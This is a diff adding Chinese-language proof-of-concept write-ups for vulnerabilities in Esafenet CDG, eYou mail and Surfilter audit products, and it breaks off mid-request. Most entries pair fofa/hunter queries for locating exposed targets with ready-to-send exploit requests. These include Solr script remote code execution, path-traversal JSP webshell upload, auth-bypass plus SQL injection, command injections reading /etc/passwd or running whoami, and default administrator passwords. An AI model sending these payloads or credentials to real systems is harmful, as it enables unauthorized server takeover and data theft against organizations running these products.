FKCFODBDNAOIDMEFBLPBAIABHFJBNGMIKCJFGLPEHNDJHMGKFPPGEAFHEBFACNBIGGEIKCPBGIKHHNEAEMOAKKEMFKHDEBEGDDGJJLCIIICMNIDNMBIKHIDLJNCOHFENHIFNKJEECDNLHMPGPGMJMGJIJHDBFECNLMLFCLDFOMCFNBJELHJFFLDKGNOIHKEIFCBPOPCBGIJENFHKCNKOJMFBFIPFGBLFJCFPFNOCKGAADPFFEJFDNKGFMEILHBFMAFBMBOFNDGOMCGNIGJGOBPEOBPEKGPMMEMHLHMMCNDCDFPMACNDELNHGCALNPHHNFFLNAKEEEELCDLHDHBFOJBJFHBOJNBGEOLIACBICKNMEEGPBEKIBEEMKGKLDAKAALKOBBJIGECCKHILNGKJLKGJBOPOFHCNHBKFPHLLLLMNNKPJADFGMCMPLILPCLOLJPOCIOOPOAPPMPFOEPNFGEEDALHLEIHJFAIHCFKLJKCBAABOIBBEAGAAPJJIHIHIACHLKBCPMEHCDGDPKPMALDBADOEKFMDFGAPPGNNJDAMPMNBAEHLLGIGCOLKJPGANBJODFEMFHHDAIMFNNIAEAKLKBBEEADPHIDIINDABGNKNOODAGKLPGAIOIFJLONMCNGOMOEALKIIJFLAHEDDNHDENODGINCAGDBFAAECFCNPBBOBBIALOHDOIOMMMJCAHMEFMAGNLALDIPAJPHLOKCHJGGLGEHFJKMDEAHEGABCCMCFOBFCMGGKGBCCBPJIJJNHNAPPECAPJEHMDMOLFIEOIFOFFGKCFCNFAKAPGBMEBJGIDLDBNHOLJGLOKOOKCNHGLNEGNBKHFDOJINFAPPKMMOJCOCENEHPCGDNKKOJFPBNFHIDDHFPHMCOAOKMOPHJNOJCFOJJGOOLNCKAHBFDPIDMJGKBHHEAIOKPJEAJJCNJFMMCKHJANGDEIHKHBAAFJCJGGECNBIBNLBLFMBGDJGHJDPMBIMPJLLBNNANCJJHBJBLEPGNIJOLGJLCGEJKNGBLDLGKMIOANJGGDPHHCGHLENGJHBANCELNLNNBADCDDCDOENGLFGIEBCMHPFBLOIDMDNBCAMFMCMMKCDKPOFBJFBGCMPOFAPCILIPFJDEDDAGKFMHBBEHIHOAGDKPONBOADJEIKKBPNBAPDNOEEEFONAMIFBLIHLLKOLEFHKPPKONJOCFHFOAPIJGMHKPHGIMBGOBOAOCGLMGDLIOPIJKFJIPCHAJEGJFCPOBLAEDFFGIMKEIPDBKNCKIHFHCIHDFACJMOGHMONMPPDKODNGCOBFMKBBMIEFGHOKOMDADNGANEMKDFLNMCABMOONIFKFEGDLJFAHLOODEBNBKFGPLANHIJFFDLBFJDCJHMPCPHBDPFICAJHCBBKLNLGEPHMCGKEKOLJBIIAMLMCFBIGACEHBBLHAIBBODKEDBPKPADPBJIKCGFCKDHPKCGELAMHIFEBBICMAGHPDCIIAJMBKCFMHJDHIPNNHFJILAIBPKKGLOEONLBLJGCIMHKAJCAHCNNDBDEJNDGFNMEJJECPFIONGEMLMOPEDNJDFBAHAEBOKMCNEMBEOMFIFCKLEKNLJOAINFFJLKPGPLHJMAOMLFLGDPBCIIPPPOHNMKOKPGEMFEOLDEHEJMPIOIAODDNJOFGLHNDAJICAOFOJKDDFBMMJJEIAPPNDBAKMJIIGNHJOPHKPINANLLLBBIGNIKKHDLKLJGOPKHGHICEACMCJNMMDJGBNACEOFNBDNKAKIOMHPECJEELPLNGPGMPHCOJGOFBENNNKIEKOJHKDAFGBAKHGILNJMMOKHDMIDIOGGKPFIFJOLIDDEGFCLKGNICGHJOINJCBOPOBKNAIDEEAGGLCMCEGPGEDPNFIKEADDPPINJIOMFKGCMJHDHLGMODMMGCNEIGNGGEMLLABHCCHGGDPGHJFBJMCCFGJCLCFCDJEBFMDMIEDBFJPKLONGIHJABFOGBAALJKCADCBOMDFAHLBPIJEFGLGOGPEAFAKFJCALDHMICDCIHPICLPEANCLCBKOIAMEHHLFIJHPEACFCPDDKCJHMNDBHEHLHBHHPEEACDMICBKGDHODHPCMLAMHOEJKAOODJCIPGMOCGPOAFJDDLGCENAKAFDBDEOKAGLBHJHEJEHCCJEFMIFNJDPDFNFFPAOLIHNFLJDDECGLCJNEEACCJDHPKOIJMOJOPDOKIGOPKMOHHPNOLCDHMOOFDKKBCBEPJPFJBDOEJBCODALFBPMGFPHEMFIBCBEMCANBOMOAKAIGFHJAKKGGAMDPDFMHEEDFHOHKABHBEJFEGAEIPMBPBIHIABBILCOGDCPKHJIPBLCLJEENPKOJLHMALCEKELIPFFLJNNBINAPPOFHPEJDNNILKCEECPJIGJMKEJCNPEKJMDKPLLEHDDIGKKEDEPFHIJKKPNBBAJAMKNMNHIJFHBCKPKAKMAKCHMJJPFMFCFBKJMMEBABPCGCOCNKBJJPLMPHPJFLJLDABHNFFBOIGNCOFHBMFKCKMMENEJCPDOBPMAIDHBNKIAIGKAAHDCAIBLBKPNNLBNMEDCCOBGMDMAHJPPENANOCILDNELHNCIEAOMGKLMCLLEDDPNLDJNBFPEJOKCNNCJHKAPOCGFGENACAGBNBDEIAMGCCGKDNOLNKOCNMMABOMGGKGOFFOLKALPKFNMJJMEMMBBIAAFAAFPIBBDLOENGFIJJAFHNKKIDCGJNIGAFPCPDHPJAKCEKCCKDAIEDJCIJGMJJLEOEDELMJJMEJCCNEIMPDKIALLHFJNNGHOMIJIDPOCLOMECDFMEPAGLKNKEAPKHCBCFDINJHAGJAGPCGEJJEFAABLOEHMDIIGNKKDIILLFGPMBOIKEAAAJGPJHFGAFFPFEPKIKLKBMKLODNLBMFIEFPGAGFPCDCPJACDAEHCFOGEJHHLLBLBBDDOEEJJBPPHDCCOGPOPFOPCFJKBGCNCLLHNAJKIKLHKKIJLAIKBHCMBODNCPCLNHDLMHDPNKGIBANJJHCFLIMKPFOAIEDBDMIBEEPIHODEOLGAJHBNEOGCKIBMGIMJKLAOFAIACFJGOFEIBIOOPDCDCNFIOGCDKEGHEIAOBDCKLLGMEOEKIEHCEBFKAGOLFGCMNLNMJCNJMDBHMDPEGHHFKOJDDAPPHJMBLBDODOHKPNABBMBHMCCMKINKJLCIFBIPCENLPLOFOAJPEFHCDEOGLGFHNOBFFLHDMHNEFAIPMBJJMIIDAEAJAKGDIHIOIPIOPBJKOLEHJLBIOLGLBMHNCNDAHOGDOILIJANBPNLPPKCOKJFJPCLFJPGKDCBMGEOGGGANMMKDILOMJJLPKJJCOPFKPFAHNAIMDOKPCIKNEMFGMGCOGGMKBIBDEKDAKBPBJKPAFGODBFLGADBFNMDAHGLDGNFLLBONBDLAAOIIICMHIPDJCMHBGLFJAIMIBHABENMJOEHJLKGIIJDBBEHFJCHAPPIDAIAILKODLCALBBJNPCGLPKIEOLEOMKEMBLMLBEGKNGCOKOFIPBCFAAHGCIMCAKFFLFIBDHCDFHMKKNDHLCGIMMNKMGOPFDMJHCMOGLKPICOEEDDKPAHLEGOMDMDFLKFECCPILAKGLGDEMGMGEPODAGGJPPNDCHOBPHJKBDAKECOBIOJGKDMBKDBFPEGIGNOBDGELAENFFLCBKHHJADGFGCBAINLJPDMOBGLNNHAOBHGLGMMLDHGINFFOLLALGGAADPGMNJDMNOLKINDIKKIHJKDEKFAJDHPHNGAIBGNAODMICFEFCCHDPGMLJOGIJCIOOMMGEKPILGPFJOCMKILLFGPEAIBIDBGNPPDHLLAHMKLEJBJFBFPFBDNEJCNPK
+```
+
+![1706613643120-ab50dae9-d908-47dc-8790-596fc500c895.png](./img/FWq4b7eTAr1EZ3xC/1706613643120-ab50dae9-d908-47dc-8790-596fc500c895-888872.png)
+
+
+
+> 更新: 2024-04-20 22:01:31  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/lnnfdl21xfvlxxzk>
\ No newline at end of file
diff --git a/亿赛通电子文档安全管理系统solr远程命令执行漏洞.md b/亿赛通电子文档安全管理系统solr远程命令执行漏洞.md
new file mode 100644
index 0000000..d1684cc
--- /dev/null
+++ b/亿赛通电子文档安全管理系统solr远程命令执行漏洞.md
@@ -0,0 +1,45 @@
+# 亿赛通电子文档安全管理系统solr远程命令执行漏洞
+
+# 一、漏洞简介
+亿赛通电子文档安全管理系统是一款电子文档安全加密软件，该系统利用驱动层透明加密技术，通过对电子文档的加密保护，防止内部员工泄密和外部人员非法窃取企业核心重要数据资产，对电子文档进行全生命周期防护，系统具有透明加密、主动加密、智能加密等多种加密方式，用户可根据部门涉密程度的不同（如核心部门和普通门），部署力度轻重不一的梯度式文档加密防护，实现技术、管理、审计进行有机的结合，在内部构建起立体化的整体信息防泄露体系，使得成本、效率和安全三者达到平衡，实现电子文档的数据安全。亿赛通电子文档安全管理系统/solr/flow/dataimport接口处存在远程代码执行漏洞，未经授权的攻击者可通过此漏洞执行任意指令，从而获取服务器权限。
+
+# 二、影响版本
++ 亿赛通电子文档安全管理系统
+
+# 三、资产测绘
++ hunter`app.name="ESAFENET 亿赛通文档安全管理系统"`
++ 登录页面
+
+![1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6.png](./img/cfnJVGCzkeilIbJP/1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6-187174.png)
+
+# 四、漏洞复现
+1. 访问以下POC，出现如下情况表达可能存在漏洞
+
+```plain
+/solr/flow/dataimport
+```
+
+![1693912289560-07146346-38c6-403c-822d-ac28e0b0a78c.png](./img/cfnJVGCzkeilIbJP/1693912289560-07146346-38c6-403c-822d-ac28e0b0a78c-145681.png)
+
+2. 通过exp执行命令
+
+```plain
+POST /solr/flow/dataimport?command=full-import&verbose=false&clean=false&commit=false&debug=true&core=tika&name=dataimport&dataConfig=%0A%3CdataConfig%3E%0A%3CdataSource%20name%3D%22streamsrc%22%20type%3D%22ContentStreamDataSource%22%20loggerLevel%3D%22TRACE%22%20%2F%3E%0A%0A%20%20%3Cscript%3E%3C!%5BCDATA%5B%0A%20%20%20%20%20%20%20%20%20%20function%20poc(row)%7B%0A%20var%20bufReader%20%3D%20new%20java.io.BufferedReader(new%20java.io.InputStreamReader(java.lang.Runtime.getRuntime().exec(%22whoami%22).getInputStream()))%3B%0A%0Avar%20result%20%3D%20%5B%5D%3B%0A%0Awhile(true)%20%7B%0Avar%20oneline%20%3D%20bufReader.readLine()%3B%0Aresult.push(%20oneline%20)%3B%0Aif(!oneline)%20break%3B%0A%7D%0A%0Arow.put(%22title%22%2Cresult.join(%22%5Cn%5Cr%22))%3B%0Areturn%20row%3B%0A%0A%7D%0A%0A%5D%5D%3E%3C%2Fscript%3E%0A%0A%3Cdocument%3E%0A%20%20%20%20%3Centity%0A%20%20%20%20%20%20%20%20stream%3D%22true%22%0A%20%20%20%20%20%20%20%20name%3D%22entity1%22%0A%20%20%20%20%20%20%20%20datasource%3D%22streamsrc1%22%0A%20%20%20%20%20%20%20%20processor%3D%22XPathEntityProcessor%22%0A%20%20%20%20%20%20%20%20rootEntity%3D%22true%22%0A%20%20%20%20%20%20%20%20forEach%3D%22%2FRDF%2Fitem%22%0A%20%20%20%20%20%20%20%20transformer%3D%22script%3Apoc%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%3Cfield%20column%3D%22title%22%20xpath%3D%22%2FRDF%2Fitem%2Ftitle%22%20%2F%3E%0A%20%20%20%20%3C%2Fentity%3E%0A%3C%2Fdocument%3E%0A%3C%2FdataConfig%3E%0A%20%20%20%20%0A%20%20%20%20%20%20%20%20%20%20%20 HTTP/1.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
+Host: xx.xx.xx.xx
+Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
+Connection: close
+Content-Length: 83
+
+<?xml version="1.0" encoding="UTF-8"?>
+        <RDF>
+        <item/>
+        </RDF>
+```
+
+![1693912808724-4ca385b2-b3a5-48cc-a538-677203a4e3be.png](./img/cfnJVGCzkeilIbJP/1693912808724-4ca385b2-b3a5-48cc-a538-677203a4e3be-515003.png)
+
+
+
+> 更新: 2024-04-20 22:01:35  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/mfo68msf0ufl9qz8>
\ No newline at end of file
diff --git a/亿赛通电子文档安全管理系统syn_user_policy任意文件上传漏洞.md b/亿赛通电子文档安全管理系统syn_user_policy任意文件上传漏洞.md
new file mode 100644
index 0000000..7dcb7ae
--- /dev/null
+++ b/亿赛通电子文档安全管理系统syn_user_policy任意文件上传漏洞.md
@@ -0,0 +1,47 @@
+# 亿赛通电子文档安全管理系统syn_user_policy任意文件上传漏洞
+
+# 一、漏洞简介
+ 亿赛通电子文档安全管理系统（简称：CDG）是一款电子文档安全加密软件，该系统利用驱动层透明加密技术，通过对电子文档的加密保护，防止内部员工泄密和外部人员非法窃取企业核心重要数据资产，对电子文档进行全生命周期防护，系统具有透明加密、主动加密、智能加密等多种加密方式，用户可根据部门涉密程度的不同（如核心部门和普通部门），部署力度轻重不一的梯度式文档加密防护，实现技术、管理、审计进行有机的结合，在内部构建起立体化的整体信息防泄露体系，使得成本、效率和安全三者达到平衡，实现电子文档的数据安全。亿赛通电子文档安全管理系统UploadFileFromClientServiceForClient接口处存在任意文件上传漏洞，未经授权的攻击者可通过此漏洞上传恶意后门文件，从而获取服务器权限。
+
+# 二、影响版本
++ 亿赛通电子文档安全管理系统
+
+# 三、资产测绘
++ hunter`app.name="ESAFENET 亿赛通文档安全管理系统"`
++ 登录页面
+
+![1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6.png](./img/u9Ky1y2wQUawV_F0/1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6-968665.png)
+
+# 四、漏洞复现
+```plain
+POST /CDGServer3/fileType/importFileType.do?flag=syn_user_policy HTTP/1.1
+Host: xx.xx.xx.xx
+User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
+Content-Length: 287
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundarysebeiskw
+Accept-Encoding: gzip, deflate
+Connection: close
+
+------WebKitFormBoundarysebeiskw
+Content-Disposition: form-data; name="fileshare"; filename="/..\\..\\..\\..\\webapps\\ROOT\\test.jsp"
+
+<% out.println(1111);new java.io.File(application.getRealPath(request.getServletPath())).delete(); %>
+------WebKitFormBoundarysebeiskw--
+```
+
+![1699887100367-6d125344-50c6-4d4f-ab9f-efa399cc55a1.png](./img/u9Ky1y2wQUawV_F0/1699887100367-6d125344-50c6-4d4f-ab9f-efa399cc55a1-779465.png)
+
+<font style="color:rgb(51, 51, 51);">服务器回显</font><font style="color:rgb(232, 62, 140);background-color:rgb(246, 246, 246);">{"result":"xmlFail","msg":"操作失败"}</font><font style="color:rgb(51, 51, 51);">则上传成功</font>
+
+<font style="color:rgb(51, 51, 51);">上传文件位置</font>
+
+```plain
+/test.jsp 
+```
+
+![1699887140558-b9f3503d-d25c-40cf-82c8-04c185296eed.png](./img/u9Ky1y2wQUawV_F0/1699887140558-b9f3503d-d25c-40cf-82c8-04c185296eed-535457.png)
+
+
+
+> 更新: 2024-04-20 22:01:35  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/zkvw8ryeiekwzudv>
\ No newline at end of file
diff --git a/亿赛通电子文档安全管理系统updateUserToOrganise存在后台SQL注入漏洞.md b/亿赛通电子文档安全管理系统updateUserToOrganise存在后台SQL注入漏洞.md
new file mode 100644
index 0000000..9499846
--- /dev/null
+++ b/亿赛通电子文档安全管理系统updateUserToOrganise存在后台SQL注入漏洞.md
@@ -0,0 +1,76 @@
+# 亿赛通电子文档安全管理系统updateUserToOrganise存在后台SQL注入漏洞
+
+# 一、漏洞简介
+ 亿赛通电子文档安全管理系统（简称：CDG）是一款电子文档安全加密软件，该系统利用驱动层透明加密技术，通过对电子文档的加密保护，防止内部员工泄密和外部人员非法窃取企业核心重要数据资产，对电子文档进行全生命周期防护，系统具有透明加密、主动加密、智能加密等多种加密方式，用户可根据部门涉密程度的不同（如核心部门和普通部门），部署力度轻重不一的梯度式文档加密防护，实现技术、管理、审计进行有机的结合，在内部构建起立体化的整体信息防泄露体系，使得成本、效率和安全三者达到平衡，实现电子文档的数据安全。亿赛通电子文档安全管理系统updateUserToOrganise存在后台SQL注入漏洞，攻击者可通过该漏洞获取数据库敏感信息。
+
+# 二、影响版本
++ 亿赛通电子文档安全管理系统
+
+# 三、资产测绘
++ hunter`app.name="ESAFENET 亿赛通文档安全管理系统"`
++ 登录页面
+
+![1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6.png](./img/qycXV3gmNouzwWlZ/1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6-291578.png)
+
+# 四、漏洞复现
+1. 通过身份认证绕过漏扫获取cookie
+
+```java
+POST /CDGServer3/LinkFilterService HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:120.0) Gecko/20100101 Firefox/120.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Connection: close
+Upgrade-Insecure-Requests: 1
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 98
+
+path=BOFGGPFBFIFPBHFMGKGI&userId=GCGHGAGGFAFHFGFCFEFPFD&cur=DBNJOADCFBOPECMNBCOHMDMDKGCMMLFFCJCACB
+```
+
+![1706457190372-a4617e08-6349-4765-8781-65369d7d4a99.png](./img/qycXV3gmNouzwWlZ/1706457190372-a4617e08-6349-4765-8781-65369d7d4a99-664924.png)
+
+```java
+JSESSIONID=719804E36DC9165F889264FEFC9C60C3; Path=/CDGServer3; HttpOnly
+```
+
+2. sql注入
+
+```java
+POST /CDGServer3/user/updateUserToOrganise.jsp;Service HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
+Connection: close
+Content-Length: 33
+Content-Type: application/x-www-form-urlencoded
+Cookie: JSESSIONID=719804E36DC9165F889264FEFC9C60C3; Path=/CDGServer3; HttpOnly
+Accept-Encoding: gzip
+
+userId=1';WAITFOR DELAY '0:0:1'--
+```
+
+![1706457248013-9305c59d-b8d9-4f17-bcc6-b9a1707e8cce.png](./img/qycXV3gmNouzwWlZ/1706457248013-9305c59d-b8d9-4f17-bcc6-b9a1707e8cce-940116.png)
+
+3. sqlmap
+
+```java
+POST /CDGServer3/user/updateUserToOrganise.jsp;Service HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
+Connection: close
+Content-Length: 33
+Content-Type: application/x-www-form-urlencoded
+Cookie: JSESSIONID=719804E36DC9165F889264FEFC9C60C3; Path=/CDGServer3; HttpOnly
+Accept-Encoding: gzip
+
+userId=1
+```
+
+![1706457552134-bbb6ed1c-7502-4dfb-81fe-f08c238044a8.png](./img/qycXV3gmNouzwWlZ/1706457552134-bbb6ed1c-7502-4dfb-81fe-f08c238044a8-154865.png)
+
+
+
+> 更新: 2024-04-20 22:01:34  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/cfx26o5cmkgld0ga>
\ No newline at end of file
diff --git a/亿赛通电子文档安全管理系统uploadFile任意文件上传漏洞.md b/亿赛通电子文档安全管理系统uploadFile任意文件上传漏洞.md
new file mode 100644
index 0000000..028e1d3
--- /dev/null
+++ b/亿赛通电子文档安全管理系统uploadFile任意文件上传漏洞.md
@@ -0,0 +1,61 @@
+# 亿赛通电子文档安全管理系统uploadFile任意文件上传漏洞
+
+# 一、漏洞简介
+ 亿赛通电子文档安全管理系统（简称：CDG）是一款电子文档安全加密软件，该系统利用驱动层透明加密技术，通过对电子文档的加密保护，防止内部员工泄密和外部人员非法窃取企业核心重要数据资产，对电子文档进行全生命周期防护，系统具有透明加密、主动加密、智能加密等多种加密方式，用户可根据部门涉密程度的不同（如核心部门和普通部门），部署力度轻重不一的梯度式文档加密防护，实现技术、管理、审计进行有机的结合，在内部构建起立体化的整体信息防泄露体系，使得成本、效率和安全三者达到平衡，实现电子文档的数据安全。亿赛通电子文档安全管理系统uploadFile接口处存在任意文件上传漏洞，未经授权的攻击者可通过此漏洞上传恶意后门文件，从而获取服务器权限。
+
+# 二、影响版本
++ 亿赛通电子文档安全管理系统
+
+# 三、资产测绘
++ hunter`app.name="ESAFENET 亿赛通文档安全管理系统"`
++ 登录页面
+
+![1706170000549-fdc86adb-1d49-443d-b3db-0a49c1a9ff04.png](./img/m4IM7b6tuy2o6nC3/1706170000549-fdc86adb-1d49-443d-b3db-0a49c1a9ff04-525849.png)
+
+![1711288172901-1346b066-5e2d-4825-9082-5e0e82e24f69.png](./img/m4IM7b6tuy2o6nC3/1711288172901-1346b066-5e2d-4825-9082-5e0e82e24f69-766504.png)
+
+# 四、漏洞复现
+该漏洞是在在该域名8021端口下进行上传，上传的内容是在8443端口或者8090端口
+
+上传文件
+
+```plain
+POST /file/uploadFile HTTP/1.1
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
+Content: MGIFOACOKLJAHOGCPPOBDFLGJFPACJJKLFGFOBDNHAGLEDGALNKAEHDLMEOODCBFDIMEFNGHCMGBPABDLPPCHCLMAELIDDCLOGNPOCGHIEFJHIOEIIPPJBCIFCPDOKIOMKPPDGPHCALHOJNNBLJBHGLMPBFICDGGMMOLGLGMIHOOFLHLBEHNIHOPOEKKIPHCMJAOMGMNPFINKHMPBFOJBJPNLNKILIOCMJIGHMNBBEBIAIKCHLENKGCPMEIIGODKKOEJJFEEIPNGHGBOOEIKNIOHIMCDONLKCEIFHIGKLHEGJNHMDAMIIELDOPGDKPOKKAHHDIMOJCJNHKMFABAFLFFDGEAJPIEOGPBNDHEOLDFBOFPFKBCEABHOPFDECBHBCFCEGO
+Content-Type: multipart/form-data; boundary=00content0boundary00
+Host: 
+Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
+Content-Length: 144
+Connection: close
+
+--00content0boundary00
+Content-Disposition: form-data; name="file"; filename="file"
+Content-Type: image/jpg
+
+123
+--00content0boundary00--
+```
+
+![1711288224792-c3d7eaa3-82db-4e39-afe9-4bdf5cc03fb3.png](./img/m4IM7b6tuy2o6nC3/1711288224792-c3d7eaa3-82db-4e39-afe9-4bdf5cc03fb3-142205.png)
+
+```plain
+CBDJCOKKKDJALCHGLOICCHCGLHNPDANBDGPPNLNLHMHLAAAGALIIHCBFPKNFHKOFEIOKAOMHAMHLILNEHEPEMGFFHOPCEPFAHHGPLHEJOKNNMLCMCCFDJNKECLEGOLOMMKPPDGPHCALHOJNNBLJBHGLMPBFICDGGEJMJMMGCAKMOOBKBNECCMOMJMEDMPDAJBMNKIJFPFOPEFNDABHJCLAINBDMEEODMBGKLIHCLLONIIGNIEMCBNKAPNPFPLOHCGM
+```
+
+![1711288247140-9a262aae-7ed7-47ba-910f-1d3fb269cd07.png](./img/m4IM7b6tuy2o6nC3/1711288247140-9a262aae-7ed7-47ba-910f-1d3fb269cd07-977723.png)
+
+![1711288273648-ef811a29-dcb7-4035-9a18-bc44f187757f.png](./img/m4IM7b6tuy2o6nC3/1711288273648-ef811a29-dcb7-4035-9a18-bc44f187757f-403907.png)
+
+上传文件位置，在8443端口或者8090端口
+
+```plain
+https://ip:8443/CDGServer3/3g/stc.jsp
+```
+
+![1711288324445-93a6a907-0da7-436e-822c-ca495d9712bd.png](./img/m4IM7b6tuy2o6nC3/1711288324445-93a6a907-0da7-436e-822c-ca495d9712bd-945014.png)
+
+
+
+> 更新: 2024-04-20 22:01:30  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/dhcm5vbe1lakywrb>
\ No newline at end of file
diff --git a/亿赛通电子文档安全管理系统存在3处弱口令漏洞.md b/亿赛通电子文档安全管理系统存在3处弱口令漏洞.md
new file mode 100644
index 0000000..9f4857a
--- /dev/null
+++ b/亿赛通电子文档安全管理系统存在3处弱口令漏洞.md
@@ -0,0 +1,34 @@
+# 亿赛通电子文档安全管理系统存在3处弱口令漏洞
+
+亿赛通电子文档安全管理系统（E-SafeDoc）是一种用于保护企业和组织的敏感信息的安全管理系统。它通过对电子文档进行加密、权限控制和日志记录等措施，确保数据的安全性。然而，这类系统有时会出现安全漏洞，其中之一就是弱口令漏洞。
+
+## fofa
+
+```javascript
+body="/CDGServer3/index.jsp"
+```
+
+## poc
+
+### druid
+
+```javascript
+/CDGServer3/druid/login.html
+账号：druid
+密码：EstNet.Druid
+```
+
+### 文档管理员弱口令
+
+```
+账号：DocAdmin
+密码：Est@Spc820
+```
+
+### 日志管理员弱口令
+
+```
+账号：LogAdmin
+密码：Est@Spc820
+```
+
diff --git a/亿邮电子邮件系统远程命令执行漏洞-(CNVD-2021-26422).md b/亿邮电子邮件系统远程命令执行漏洞-(CNVD-2021-26422).md
new file mode 100644
index 0000000..49b3800
--- /dev/null
+++ b/亿邮电子邮件系统远程命令执行漏洞-(CNVD-2021-26422).md
@@ -0,0 +1,37 @@
+# 亿邮电子邮件系统远程命令执行漏洞-(CNVD-2021-26422)
+
+## 一、漏洞描述
+亿邮电子邮件系统是由北京亿中邮信息技术有限公司（以下简称亿邮公司）开发的一款面向中大型集团企业、政府、高校用户的国产邮件系统。未经身份验证的攻击者利用该漏洞，可通过精心构造恶意请求，使用POST方法在目标服务器执行命令，获取目标服务器权限，控制目标服务器。
+
+## 二、影响版本
+亿邮电子邮件系统V8.3-V8.13的部分二次开发版本
+
+## 三、资产测绘
++ hunter`app.name="eYou 亿邮"`
++ 特征
+
+![1696567603305-22b3df25-983e-4f42-af65-71eb8a482b42.png](./img/o9mcm2_H8tummENZ/1696567603305-22b3df25-983e-4f42-af65-71eb8a482b42-511744.png)
+
+## 四、漏洞复现
+```java
+POST /webadm/?q=moni_detail.do&action=gragh HTTP/1.1
+Host: xx.xx.xx.xx
+Content-Length: 25
+Accept: */*
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36
+Content-Type: application/x-www-form-urlencoded;charset=UTF-8
+Origin: chrome-extension://ieoejemkppmjcdfbnfphhpbfmallhfnc
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Cookie: EMPHPSID=ffah74s753ae239996a1mmbld0; empos=0
+Connection: close
+
+type='|cat /etc/passwd||'
+```
+
+![1696567646952-f83681b0-97b3-4e30-a215-9fca047ba97b.png](./img/o9mcm2_H8tummENZ/1696567646952-f83681b0-97b3-4e30-a215-9fca047ba97b-471511.png)
+
+
+
+> 更新: 2024-02-29 23:57:46  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/gn2zrdm01ief5yn7>
\ No newline at end of file
diff --git a/任子行网络安全审计系统log_fw_ips_scan_jsondata接口存在SQL注入漏洞.md b/任子行网络安全审计系统log_fw_ips_scan_jsondata接口存在SQL注入漏洞.md
new file mode 100644
index 0000000..930b3da
--- /dev/null
+++ b/任子行网络安全审计系统log_fw_ips_scan_jsondata接口存在SQL注入漏洞.md
@@ -0,0 +1,24 @@
+# 任子行网络安全审计系统log_fw_ips_scan_jsondata接口存在SQL注入漏洞
+
+任子行网络安全审计系统SURF-SA系列产品是任子行为各行业提供的自主可控信息化办公环境上网行为审计的安全服务。任子行网络安全审计系统 log_fw_ips_scan_jsondata 接口存在SQL注入漏洞，未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息，甚至在高权限的情况可向服务器中写入木马，进一步获取服务器系统权限。
+
+## fofa
+
+```javascript
+title="任子行网络安全审计系统"
+```
+
+## poc
+
+```javascript
+GET /webui/?g=log_fw_ips_scan_jsondata&uname='+union+select+sqlite_version(),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--+ HTTP/1.1
+Host: 
+Referer: https://
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate, br
+Connection: close
+```
+
+![image-20241122152436961](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411221524049.png)
\ No newline at end of file
diff --git a/任子行网络安全审计系统sslvpn_client存在命令执行漏洞.md b/任子行网络安全审计系统sslvpn_client存在命令执行漏洞.md
new file mode 100644
index 0000000..1855b0f
--- /dev/null
+++ b/任子行网络安全审计系统sslvpn_client存在命令执行漏洞.md
@@ -0,0 +1,41 @@
+# 任子行网络安全审计系统sslvpn_client存在命令执行漏洞
+
+# 一、漏洞简介
+任子行网络安全审计系统sslvpn_client存在命令执行漏洞，攻击者可通过此漏洞获取服务器权限。
+
+# 二、影响版本
++ 任子行网络安全审计系统
+
+# 三、资产测绘
++ hunter`web.title="任子行网络安全审计系统"`
++ 特征
+
+![1701754517024-9650a99f-36cf-4d5b-bb00-72481a181d69.png](./img/NW8qdWbMZsOQJ36m/1701754517024-9650a99f-36cf-4d5b-bb00-72481a181d69-722342.png)
+
+# 四、漏洞复现
+```java
+GET /sslvpn/sslvpn_client.php?client=logoImg&img=x%20/tmp|echo%20%60whoami%60%20|tee%20/usr/local/webui/sslvpn/ceshi.txt|ls HTTP/1.1
